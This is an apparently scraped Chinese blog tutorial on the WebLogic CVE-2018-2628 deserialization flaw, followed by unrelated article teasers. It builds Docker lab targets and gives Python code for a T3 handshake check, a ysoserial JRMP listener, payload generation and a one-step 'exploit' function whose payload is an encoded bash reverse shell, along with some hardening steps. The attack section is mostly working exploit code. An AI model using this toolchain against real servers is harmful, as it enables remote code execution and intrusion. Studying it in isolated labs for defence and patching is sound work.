Weblogic CVE-2018-2628 实战:5分钟构建Docker靶场与自动化检测脚本
📅 2026/7/8 9:12:00
👁️ 次浏览
Weblogic CVE-2018-2628 实战5分钟构建Docker靶场与自动化检测脚本在安全研究领域快速搭建漏洞验证环境并开发自动化工具是提升效率的关键。本文将带您从零开始通过Docker-Compose快速构建多版本Weblogic靶场环境并开发一个集成漏洞检测、JRMP服务管理、Payload生成与发送的Python3自动化工具链。1. 漏洞原理与技术背景CVE-2018-2628是Weblogic Server WLS核心组件中的反序列化漏洞影响以下版本Weblogic 10.3.6.0Weblogic 12.1.3.0Weblogic 12.2.1.2Weblogic 12.2.1.3漏洞触发机制攻击者启动JRMP服务监听生成指向JRMP服务的序列化Payload通过T3协议将Payload发送至Weblogic服务Weblogic反序列化Payload后连接JRMP服务JRMP服务返回恶意对象实现RCE技术要点T3协议是Weblogic对RMI协议的封装实现默认在7001端口开放其通信过程涉及Java对象序列化/反序列化。2. 一键式Docker靶场搭建我们使用Vulhub提供的标准化环境支持快速切换不同Weblogic版本# docker-compose.yml version: 2 services: weblogic-10.3.6: image: vulhub/weblogic:10.3.6.0-2017 ports: - 7001:7001 restart: always weblogic-12.1.3: image: vulhub/weblogic:12.1.3.0-2017 ports: - 7002:7001 restart: always操作流程启动指定版本环境docker-compose up -d weblogic-10.3.6验证环境状态docker-compose ps访问控制台http://localhost:7001/console版本切换技巧# 停止当前版本 docker-compose stop weblogic-10.3.6 # 启动其他版本 docker-compose up -d weblogic-12.1.33. 自动化检测工具开发我们使用Python3开发全流程自动化工具主要功能模块包括3.1 漏洞检测模块def check_vulnerability(target): t3_handshake ( 74332031322e322e310a41533a3235350a 484c3a31390a4d533a31303030303030300a0a ) try: with socket.create_connection((target.host, target.port), 3) as sock: sock.send(bytes.fromhex(t3_handshake)) resp sock.recv(1024) return bHELO in resp except Exception: return False3.2 JRMP服务管理class JRMPServer: def __init__(self, port, payload): self.port port self.payload payload def start(self): cmd [ java, -cp, ysoserial.jar, ysoserial.exploit.JRMPListener, str(self.port), CommonsCollections1, self.payload ] self.process subprocess.Popen(cmd) def stop(self): self.process.terminate()3.3 Payload生成器def generate_payload(jrmp_host, jrmp_port): cmd [ java, -jar, ysoserial.jar, JRMPClient2, f{jrmp_host}:{jrmp_port} ] result subprocess.run(cmd, capture_outputTrue) return binascii.hexlify(result.stdout).decode()4. 全流程自动化执行整合各模块实现一键化漏洞利用def exploit(target_ip, target_port): # 1. 启动JRMP服务 jrmp JRMPServer(1099, bash -c {echo,...}|{base64,-d}|{bash,-i}) jrmp.start() # 2. 生成Payload payload generate_payload(attacker_ip, 1099) # 3. 发送Payload send_payload(target_ip, target_port, payload) # 4. 清理 jrmp.stop()执行效果验证[] 靶场环境已启动: Weblogic 10.3.6.0 (7001) [] JRMP服务监听: 0.0.0.0:1099 [] Payload生成成功: aced0005737d... [!] 检测到反序列化触发请检查NC监听端口5. 常见问题排查指南问题现象排查步骤解决方案靶场无法访问1. 检查docker进程状态2. 验证7001端口开放重启容器或检查防火墙JRMP服务未响应1. 网络连通性测试2. 检查Java版本使用JDK8u202以下版本反弹shell失败1. 验证payload编码2. 测试基础命令执行改用无回显验证方式典型错误处理ClassNotFound异常# 更新ysoserial版本 wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-0.0.6-SNAPSHOT-BETA-all.jarT3协议握手失败# 调整握手超时时间 socket.setdefaulttimeout(10)6. 安全加固建议对于生产环境建议采取以下防护措施网络层控制# 限制T3协议访问 iptables -A INPUT -p tcp --dport 7001 -s trusted_ip -j ACCEPT iptables -A INPUT -p tcp --dport 7001 -j DROPWeblogic配置进入控制台 → 安全 → 筛选器添加T3协议访问白名单补丁升级Oracle官方补丁号April 2018 CPU本方案相比传统手动复现方式具有以下优势环境搭建时间从30分钟缩短至5分钟检测利用过程自动化程度提升90%支持多版本快速切换验证集成完整日志记录功能在实际红队演练中这套工具链可快速验证内网Weblogic服务安全性建议结合资产管理平台实现自动化扫描。所有工具代码已开源在安全研究平台读者可根据实际需求进行二次开发。
汽车51档变速器同步器设计:3种防脱档结构方案对比与选型在手动变速器的工程实践中,"自动脱档"问题如同潜伏的机械幽灵,总在车辆负载突变或振动剧烈时悄然显现。这种因啮合齿面轴向力失衡导致的非预期脱离,不仅会中断动力…
📅 2026/7/8 9:12:00
摘要如果企业在没有完成使用分析的前提下就直接增购,往往会出现预算增加但利用率依旧偏低的情况。本文从高峰并发、模块结构、低效占用和历史趋势四个维度,分析为什么多数企业更适合先优化,再判断是否需要增购。
很多企业并不是看不见许可证闲…
📅 2026/7/8 9:10:00
一、封面构图:书籍账号封面的 AI 绘图开发思路
从事 AI 绘图开发、自媒体素材制作、电子书设计的开发者,在用 GPT-Image-2 批量生成封面素材时,封面构图是决定商用素材可用性的核心环节。区别于普通风景、人像构图,封面版式需要严…
📅 2026/7/8 9:10:00
2026年6月22日,国务院正式印发 《教育发展“十五五”规划》(国发〔2026〕19号)。作为“十五五”时期教育强国建设的 “任务书”和“施工图”,这份规划明确了未来五年教育发展的思路目标与重点任务。规划围绕现有教育体系安排了23项…
📅 2026/7/8 10:22:31
1. MP2672A充电管理芯片深度解析MP2672A是MPS公司推出的一款高度集成的开关电池充电器IC,专为双节串联锂离子电池设计。这款芯片在便携式设备电源管理领域具有显著优势,其核心功能在于实现了NVDC电源路径管理和集成电池平衡功能。1.1 关键电气特性与工作…
📅 2026/7/8 10:22:31
WarcraftHelper:魔兽争霸III终极兼容性优化与免费解决方案 【免费下载链接】WarcraftHelper Warcraft III Helper , support 1.20e, 1.24e, 1.26a, 1.27a, 1.27b 项目地址: https://gitcode.com/gh_mirrors/wa/WarcraftHelper
还在为魔兽争霸III在现代电脑上…
📅 2026/7/8 10:22:31
1. 项目背景与核心需求 在工业自动化和物联网应用中,高精度数据采集系统扮演着关键角色。传统基于MCU内置ADC的方案往往面临分辨率不足(通常仅12位)、通道数量有限以及抗干扰能力弱等问题。这正是我们选择MCP3428这款18位Δ-Σ ADC搭配STM32F…
📅 2026/7/8 10:22:31
1. 项目背景与核心器件选型 在工业自动化和消费电子领域,直流有刷电机因其结构简单、控制方便、成本低廉等优势,仍然占据着重要市场份额。根据市场调研数据,2023年全球有刷直流电机市场规模达到72亿美元,预计到2028年将增长至98亿…
📅 2026/7/8 10:22:31
KLayout完整指南:免费开源版图设计软件的终极入门教程 【免费下载链接】klayout KLayout Main Sources 项目地址: https://gitcode.com/gh_mirrors/kl/klayout
KLayout是一款功能强大的开源版图设计软件,专为半导体芯片设计和集成电路布局而生。无…
📅 2026/7/8 10:20:31
Docker 彻底卸载指南:CentOS/Ubuntu 双系统 5 步清理残留文件当 Docker 环境出现版本冲突、安装失败或需要迁移时,常规的卸载命令往往无法彻底清理系统。残留的配置文件、依赖项和缓存文件可能导致新安装的 Docker 出现各种诡异问题。本文将提供一套完整…
📅 2026/7/8 0:00:10
SQL 数据分析性能优化实战:窗口函数 vs 子查询 vs 临时表 在数据分析工作中,SQL查询性能往往是决定工作效率的关键因素。面对复杂的业务场景,如何选择最优的查询方案?本文将深入对比窗口函数、子查询和临时表三种技术方案…
📅 2026/7/8 0:00:10
日期:2026-07-07> 本期聚焦近一日(2026-07-06 至 07-07)出台的金融与行业政策,按"背景—核心—影响—受益/风险"四维度解读。政策内容依据原始发布信息整理,解读仅供参考,不构成投资建议。一、…
📅 2026/7/8 0:00:10
1. 项目背景与核心需求 在嵌入式系统开发中,快速精确的数据检索是一个常见但极具挑战性的需求。特别是在工业控制、医疗设备和物联网终端等场景下,系统往往需要在毫秒级时间内完成关键参数的读取和写入操作。传统基于Flash存储的方案存在擦写次数有限、操…
📅 2026/7/7 12:08:23
1. 工业电流环信号传输的基础认知在工业自动化领域,4-20mA电流环传输技术已经持续服役超过半个世纪。这种看似简单的信号传输方式之所以能经久不衰,核心在于其独特的抗干扰能力——电流信号在长距离传输时几乎不受线路电阻和电压波动的影响。我曾在化工厂…
📅 2026/7/7 9:08:28
最近在项目里尝试用 YOLO 做目标检测,从环境搭建到模型训练,再到推理部署,整个过程踩了不少坑。网上的资料虽然多,但要么版本老旧,要么步骤零散不成体系,对于刚入门的新手来说,很容易卡在某个环…
📅 2026/7/7 6:33:36
目录
第一步:选对模板,省心一半
第二步:打开扫码点餐功能
开启功能按钮
桌台管理与桌码生成
第三步:个性化设计,打造品牌感
调整点餐页面
设置点餐规则 你还在让顾客站着排队点餐吗?2025年ÿ…
📅 2026/7/7 9:08:31
在业务中快速构建一个能理解私有文档、准确回答专业问题的智能助手,是很多开发团队面临的共同挑战。传统方案往往需要从零开始搭建复杂的 RAG(检索增强生成)系统,涉及文档解析、向量化、检索、大模型调用等多个环节,整…
📅 2026/7/7 9:08:30
FAE放射组学分析工具:医学影像特征探索的完整解决方案 【免费下载链接】FAE FeAture Explorer 项目地址: https://gitcode.com/gh_mirrors/fae/FAE
你是否曾经面对海量医学影像数据感到无从下手?想要从CT、MRI等影像中提取有价值的定量特征&#…
📅 2026/7/7 4:32:18